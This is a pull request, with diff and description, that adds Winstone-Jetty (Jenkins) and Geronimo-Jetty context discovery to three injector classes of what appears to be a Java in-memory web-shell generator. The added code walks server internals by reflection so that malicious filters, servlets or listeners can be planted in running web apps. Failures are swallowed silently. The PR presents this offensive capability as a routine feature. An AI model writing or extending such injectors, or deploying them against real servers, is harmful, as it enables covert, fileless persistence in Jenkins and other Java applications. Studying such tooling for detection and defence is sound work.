### PR TITLE
feat(jetty): add Winstone-Jetty and Geronimo-Jetty context discovery support

### DIFF
--- a/generator/src/main/java/com/reajason/javaweb/memshell/injector/jetty/JettyFilterInjector.java
+++ b/generator/src/main/java/com/reajason/javaweb/memshell/injector/jetty/JettyFilterInjector.java
@@ -171,6 +171,34 @@ public class JettyFilterInjector {
                 }
             } catch (Exception ignored) {
             }
+
+            // Winstone-Jetty: Launcher -> HostGroup -> HostConfigs -> webapps
+            try {
+                Object target = getFieldValue(thread, "target");
+                if (target != null && target.getClass().getName().contains("winstone.Launcher")) {
+                    java.util.Map hostConfigs = (java.util.Map) getFieldValue(getFieldValue(target, "hostGroup"), "hostConfigs");
+                    java.util.Iterator _it3 = hostConfigs.values().iterator();
+                    while (_it3.hasNext()) {
+                        java.util.Map apps = (java.util.Map) getFieldValue(_it3.next(), "webapps");
+                        contexts.addAll(apps.values());
+                    }
+                }
+            } catch (Throwable ignored) {
+            }
+
+            // Geronimo-Jetty
+            try {
+                java.util.Map map = (java.util.Map) getFieldValue(getFieldValue(getFieldValue(getFieldValue(getFieldValue(thread, "target"), "listener"), "kernel"), "registry"), "instanceRegistry");
+                java.util.Iterator _it2 = map.keySet().iterator();
+                while (_it2.hasNext()) {
+                    Object object = _it2.next();
+                    if (object.getClass().getName().equals("org.apache.geronimo.jetty7.WebAppContextWrapper")) {
+                        contexts.add(getFieldValue(object, "webAppContext"));
+                    }
+                }
+            } catch (Throwable ignored) {
+            }
+
         }
         return contexts;
     }

--- a/generator/src/main/java/com/reajason/javaweb/memshell/injector/jetty/JettyListenerInjector.java
+++ b/generator/src/main/java/com/reajason/javaweb/memshell/injector/jetty/JettyListenerInjector.java
@@ -101,6 +101,34 @@ public class JettyListenerInjector {
                 }
             } catch (Exception ignored) {
             }
+
+            // Winstone-Jetty: Launcher -> HostGroup -> HostConfigs -> webapps
+            try {
+                Object target = getFieldValue(thread, "target");
+                if (target != null && target.getClass().getName().contains("winstone.Launcher")) {
+                    java.util.Map hostConfigs = (java.util.Map) getFieldValue(getFieldValue(target, "hostGroup"), "hostConfigs");
+                    java.util.Iterator _it3 = hostConfigs.values().iterator();
+                    while (_it3.hasNext()) {
+                        java.util.Map apps = (java.util.Map) getFieldValue(_it3.next(), "webapps");
+                        contexts.addAll(apps.values());
+                    }
+                }
+            } catch (Throwable ignored) {
+            }
+
+            // Geronimo-Jetty
+            try {
+                java.util.Map map = (java.util.Map) getFieldValue(getFieldValue(getFieldValue(getFieldValue(getFieldValue(thread, "target"), "listener"), "kernel"), "registry"), "instanceRegistry");
+                java.util.Iterator _it2 = map.keySet().iterator();
+                while (_it2.hasNext()) {
+                    Object object = _it2.next();
+                    if (object.getClass().getName().equals("org.apache.geronimo.jetty7.WebAppContextWrapper")) {
+                        contexts.add(getFieldValue(object, "webAppContext"));
+                    }
+                }
+            } catch (Throwable ignored) {
+            }
+
         }
         return contexts;
     }

--- a/generator/src/main/java/com/reajason/javaweb/memshell/injector/jetty/JettyServletInjector.java
+++ b/generator/src/main/java/com/reajason/javaweb/memshell/injector/jetty/JettyServletInjector.java
@@ -109,6 +109,34 @@ public class JettyServletInjector {
                 }
             } catch (Exception ignored) {
             }
+
+            // Winstone-Jetty: Launcher -> HostGroup -> HostConfigs -> webapps
+            try {
+                Object target = getFieldValue(thread, "target");
+                if (target != null && target.getClass().getName().contains("winstone.Launcher")) {
+                    java.util.Map hostConfigs = (java.util.Map) getFieldValue(getFieldValue(target, "hostGroup"), "hostConfigs");
+                    java.util.Iterator _it3 = hostConfigs.values().iterator();
+                    while (_it3.hasNext()) {
+                        java.util.Map apps = (java.util.Map) getFieldValue(_it3.next(), "webapps");
+                        contexts.addAll(apps.values());
+                    }
+                }
+            } catch (Throwable ignored) {
+            }
+
+            // Geronimo-Jetty
+            try {
+                java.util.Map map = (java.util.Map) getFieldValue(getFieldValue(getFieldValue(getFieldValue(getFieldValue(thread, "target"), "listener"), "kernel"), "registry"), "instanceRegistry");
+                java.util.Iterator _it2 = map.keySet().iterator();
+                while (_it2.hasNext()) {
+                    Object object = _it2.next();
+                    if (object.getClass().getName().equals("org.apache.geronimo.jetty7.WebAppContextWrapper")) {
+                        contexts.add(getFieldValue(object, "webAppContext"));
+                    }
+                }
+            } catch (Throwable ignored) {
+            }
+
         }
         return contexts;
     }


### PR DESCRIPTION
## PR Title

feat(jetty): add Winstone-Jetty and Geronimo-Jetty context discovery support

## PR Body

### Description

Add support for discovering WebAppContext from non-standard Jetty launchers in `JettyServletInjector`, `JettyFilterInjector`, and `JettyListenerInjector`.

Currently, the Jetty injectors only handle standard Jetty 6 (`WebAppClassLoader`) and Jetty 7+ (`ThreadLocal` based) context discovery. This PR adds two additional discovery paths:

**Winstone-Jetty**

Jenkins uses Winstone as its embedded servlet container, which wraps Jetty internally. The context discovery path is:

```
Thread.target (winstone.Launcher) -> hostGroup -> hostConfigs -> webapps (values)
```

**Geronimo-Jetty**

Apache Geronimo can use Jetty 7 as its embedded servlet container. The context discovery path is:

```
Thread.target -> listener -> kernel -> registry -> instanceRegistry -> WebAppContextWrapper -> webAppContext
```

### Changes

- `JettyServletInjector.java` - Added Winstone-Jetty and Geronimo-Jetty context discovery in `getContext()`
- `JettyFilterInjector.java` - Same changes
- `JettyListenerInjector.java` - Same changes

All new code blocks are wrapped in independent `try-catch(Throwable)` to ensure zero impact on existing functionality when running in non-Winstone/non-Geronimo environments.
